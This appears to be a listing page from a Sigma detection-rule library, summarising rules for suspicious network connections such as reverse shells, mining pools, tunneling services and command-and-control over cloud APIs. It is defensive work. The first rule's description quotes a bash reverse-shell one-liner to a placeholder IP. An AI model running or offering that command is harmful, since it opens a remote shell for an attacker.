Rule Library

Sigma Rules

66 rules found

3,707Total
3,116Detection
451Emerging
137Hunting
Detectioncriticaltest

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

LinuxNetwork Connection
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Sat Oct 16linux
Detectionhighstable

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

LinuxNetwork Connection
TA0040 · ImpactT1496 · Resource Hijacking
Florian Roth (Nextron Systems)Tue Oct 26linux
Detectionhightest

Communication To LocaltoNet Tunneling Service Initiated - Linux

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

LinuxNetwork Connection
TA0011 · Command and ControlT1572 · Protocol TunnelingT1090 · ProxyT1102 · Web Service
Andreas Braathen (mnemonic.io)Mon Jun 17linux
Detectionhightest

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

LinuxNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1568.002 · Domain Generation Algorithms+4
Florian Roth (Nextron Systems)Thu Nov 03linux
Detectionhightest

Potentially Suspicious Malware Callback Communication - Linux

Detects programs that connect to known malware callback ports based on threat intelligence reports.

LinuxNetwork Connection
TA0003 · PersistenceTA0011 · Command and ControlT1571 · Non-Standard Port
hasseljFri May 10linux
Detectionhightest

Network Connection Initiated By AddinUtil.EXE

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.

WindowsNetwork Connection
TA0005 · Defense EvasionT1218 · System Binary Proxy Execution
Michael McKinley+1Mon Sep 18windows
Detectionmediumtest

Uncommon Connection to Active Directory Web Services

Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.

WindowsNetwork Connection
TA0007 · DiscoveryT1087 · Account Discovery
kostastsaleFri Jan 26windows
Detectionhightest

Uncommon Network Connection Initiated By Certutil.EXE

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

WindowsNetwork Connection
TA0011 · Command and ControlT1105 · Ingress Tool Transfer
François Hubaut+1Fri Sep 02windows
Detectionhightest

Outbound Network Connection Initiated By Cmstp.EXE

Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.

WindowsNetwork Connection
TA0005 · Defense EvasionT1218.003 · CMSTP
Nasreddine Bencherchali (Nextron Systems)Tue Aug 30windows
Detectionhightest

Outbound Network Connection Initiated By Microsoft Dialer

Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"

WindowsNetwork Connection
TA0002 · ExecutionTA0011 · Command and ControlT1071.001 · Web Protocols
CertainlyPFri Apr 26windows
Detectionmediumtest

Network Connection Initiated To AzureWebsites.NET By Non-Browser Process

Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

WindowsNetwork Connection
TA0011 · Command and ControlT1102 · Web ServiceT1102.001 · Dead Drop Resolver
Nasreddine Bencherchali (Nextron Systems)Mon Jun 24windows
Detectionmediumtest

Network Connection Initiated To BTunnels Domains

Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

WindowsNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1572 · Protocol Tunneling
Kamran SaifullahFri Sep 13windows
Detectionmediumtest

Network Connection Initiated To Cloudflared Tunnels Domains

Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

WindowsNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1572 · Protocol Tunneling
Kamran Saifullah+1Mon May 27windows
Detectionhighstable

Network Communication With Crypto Mining Pool

Detects initiated network connections to crypto mining pools

WindowsNetwork Connection
TA0040 · ImpactT1496 · Resource Hijacking
Florian Roth (Nextron Systems)+1Tue Oct 26windows
Detectionhightest

New Connection Initiated To Potential Dead Drop Resolver Domain

Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.

WindowsNetwork Connection
TA0011 · Command and ControlT1102 · Web ServiceT1102.001 · Dead Drop Resolver
Sorina Ionescu+1Wed Aug 17windows
Detectionmediumtest

Network Connection Initiated To DevTunnels Domain

Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

WindowsNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567.001 · Exfiltration to Code RepositoryT1572 · Protocol Tunneling
Kamran SaifullahMon Nov 20windows
Detectionhightest

Suspicious Dropbox API Usage

Detects an executable that isn't dropbox but communicates with the Dropbox API

WindowsNetwork Connection
TA0011 · Command and ControlTA0010 · ExfiltrationT1105 · Ingress Tool TransferT1567.002 · Exfiltration to Cloud Storage
Florian Roth (Nextron Systems)Wed Apr 20windows
Detectionmediumtest

Suspicious Network Connection to IP Lookup Service APIs

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.

WindowsNetwork Connection
TA0007 · DiscoveryT1016 · System Network Configuration Discovery
Janantha Marasinghe+1Mon Apr 24windows
Detectionmediumexperimental

Suspicious Non-Browser Network Communication With Google API

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

WindowsNetwork Connection
TA0011 · Command and ControlT1102 · Web Service
Gavin KnappMon May 01windows
Detectionhightest

Communication To LocaltoNet Tunneling Service Initiated

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

WindowsNetwork Connection
TA0011 · Command and ControlT1572 · Protocol TunnelingT1090 · ProxyT1102 · Web Service
Andreas Braathen (mnemonic.io)Mon Jun 17windows
Detectionlowtest

Network Connection Initiated To Mega.nz

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

WindowsNetwork Connection
TA0010 · ExfiltrationT1567.002 · Exfiltration to Cloud Storage
Florian Roth (Nextron Systems)Mon Dec 06windows
Detectionhightest

Process Initiated Network Connection To Ngrok Domain

Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

WindowsNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1572 · Protocol Tunneling+1
Florian Roth (Nextron Systems)Sat Jul 16windows
Detectionhightest

Communication To Ngrok Tunneling Service Initiated

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

WindowsNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1568.002 · Domain Generation Algorithms+4
Florian Roth (Nextron Systems)Thu Nov 03windows
Detectionlowtest

Potentially Suspicious Network Connection To Notion API

Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

WindowsNetwork Connection
TA0011 · Command and ControlT1102 · Web Service
Gavin KnappWed May 03windows
Detectionmediumtest

Network Communication Initiated To Portmap.IO Domain

Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors

WindowsNetwork Connection
T1041 · Exfiltration Over C2 ChannelTA0011 · Command and ControlT1090.002 · External ProxyTA0010 · Exfiltration
Florian Roth (Nextron Systems)Fri May 31windows
Detectionmediumtest

Suspicious Non-Browser Network Communication With Telegram API

Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2

WindowsNetwork Connection
TA0011 · Command and ControlTA0010 · ExfiltrationT1102 · Web ServiceT1567 · Exfiltration Over Web Service+1
Nasreddine Bencherchali (Nextron Systems)Fri May 19windows
Detectionmediumtest

Network Connection Initiated To Visual Studio Code Tunnels Domain

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

WindowsNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1572 · Protocol Tunneling
Kamran SaifullahMon Nov 20windows
Detectionhightest

Network Connection Initiated By Eqnedt32.EXE

Detects network connections from the Equation Editor process "eqnedt32.exe".

WindowsNetwork Connection
TA0002 · ExecutionT1203 · Exploitation for Client Execution
Max Altgelt (Nextron Systems)Thu Apr 14windows
Detectionhighexperimental

Network Connection Initiated via Finger.EXE

Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server. Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion. Investigating such network connections can also help identify potential malicious infrastructure used by threat actors

WindowsNetwork Connection
TA0011 · Command and ControlT1071.004 · DNSTA0002 · ExecutionT1059.003 · Windows Command Shell
Swachchhanda Shrawan Poudel (Nextron Systems)Wed Nov 19windows
Detectionhightest

Network Connection Initiated By IMEWDBLD.EXE

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

WindowsNetwork Connection
TA0011 · Command and ControlT1105 · Ingress Tool Transfer
François HubautSat Jan 22windows
Detectionhightest

Network Connection Initiated Via Notepad.EXE

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.

WindowsNetwork Connection
TA0004 · Privilege EscalationTA0011 · Command and ControlTA0002 · ExecutionTA0005 · Defense Evasion+1
EagleEye TeamThu May 14windows
Detectionmediumtest

Office Application Initiated Network Connection To Non-Local IP

Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.

WindowsNetwork Connection
TA0002 · ExecutionT1203 · Exploitation for Client Execution
Christopher Peacock+4Wed Nov 10windows
Detectionmediumtest

Office Application Initiated Network Connection Over Uncommon Ports

Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.

WindowsNetwork Connection
TA0005 · Defense EvasionTA0011 · Command and Control
X__Junior (Nextron Systems)+1Wed Jul 12windows
Detectionmediumtest

Python Initiated Connection

Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

WindowsNetwork Connection
TA0007 · DiscoveryT1046 · Network Service Discovery
François HubautFri Dec 10windows
Detectionhightest

Outbound RDP Connections Over Non-Standard Tools

Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.

WindowsNetwork Connection
TA0008 · Lateral MovementT1021.001 · Remote Desktop Protocol2013-07-002 · CAR 2013-07-002
Markus NeisWed May 15windows
Detectionhightest

RDP Over Reverse SSH Tunnel

Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389

WindowsNetwork Connection
TA0011 · Command and ControlT1572 · Protocol TunnelingTA0008 · Lateral MovementT1021.001 · Remote Desktop Protocol+1
Samir BousseadenSat Feb 16windows
Detectionhightest

RDP to HTTP or HTTPS Target Ports

Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443

WindowsNetwork Connection
TA0011 · Command and ControlT1572 · Protocol TunnelingTA0008 · Lateral MovementT1021.001 · Remote Desktop Protocol+1
Florian Roth (Nextron Systems)Fri Apr 29windows
Detectionmediumtest

RegAsm.EXE Initiating Network Connection To Public IP

Detects "RegAsm.exe" initiating a network connection to public IP adresses

WindowsNetwork Connection
TA0005 · Defense EvasionT1218.009 · Regsvcs/Regasm
François HubautThu Apr 25windows
Detectionmediumtest

Network Connection Initiated By Regsvr32.EXE

Detects a network connection initiated by "Regsvr32.exe"

WindowsNetwork Connection
TA0002 · ExecutionT1559.001 · Component Object ModelTA0005 · Defense EvasionT1218.010 · Regsvr32
Dmitriy Lifanov+1Fri Oct 25windows
Detectionmediumexperimental

Remote Access Tool - AnyDesk Incoming Connection

Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.

WindowsNetwork Connection
TA0003 · PersistenceTA0011 · Command and Controlattack.t1219.002
Mon Sep 02windows
Detectionmediumtest

Rundll32 Internet Connection

Detects a rundll32 that communicates with public IP addresses

WindowsNetwork Connection
TA0005 · Defense EvasionT1218.011 · Rundll32TA0002 · Execution
Florian Roth (Nextron Systems)Sat Nov 04windows
Detectionhightest

Silenttrinity Stager Msbuild Activity

Detects a possible remote connections to Silenttrinity c2

WindowsNetwork Connection
TA0002 · ExecutionTA0005 · Defense EvasionT1127.001 · MSBuild
Kiran kumar s+1Sun Oct 11windows
Detectionhightest

Suspicious Network Connection Binary No CommandLine

Detects suspicious network connections made by a well-known Windows binary run with no command line parameters

WindowsNetwork Connection
TA0005 · Defense Evasion
Florian Roth (Nextron Systems)Sun Jul 03windows
Detectionhightest

Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

WindowsNetwork Connection
TA0011 · Command and ControlT1105 · Ingress Tool Transfer
Florian Roth (Nextron Systems)+1Thu Aug 30windows
Detectionhightest

Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location

Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.

WindowsNetwork Connection
TA0011 · Command and ControlT1105 · Ingress Tool Transfer
Florian Roth (Nextron Systems)+1Sun Mar 19windows
Detectionhightest

Potentially Suspicious Malware Callback Communication

Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases

WindowsNetwork Connection
TA0003 · PersistenceTA0011 · Command and ControlT1571 · Non-Standard Port
Florian Roth (Nextron Systems)Sun Mar 19windows
Detectionmediumtest

Communication To Uncommon Destination Ports

Detects programs that connect to uncommon destination ports

WindowsNetwork Connection
TA0003 · PersistenceTA0011 · Command and ControlT1571 · Non-Standard Port
Florian Roth (Nextron Systems)Sun Mar 19windows
Detectionmediumtest

Uncommon Outbound Kerberos Connection

Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

WindowsNetwork Connection
TA0005 · Defense EvasionTA0006 · Credential AccessT1558 · Steal or Forge Kerberos TicketsTA0008 · Lateral Movement+1
Ilyas Ochkov+1Thu Oct 24windows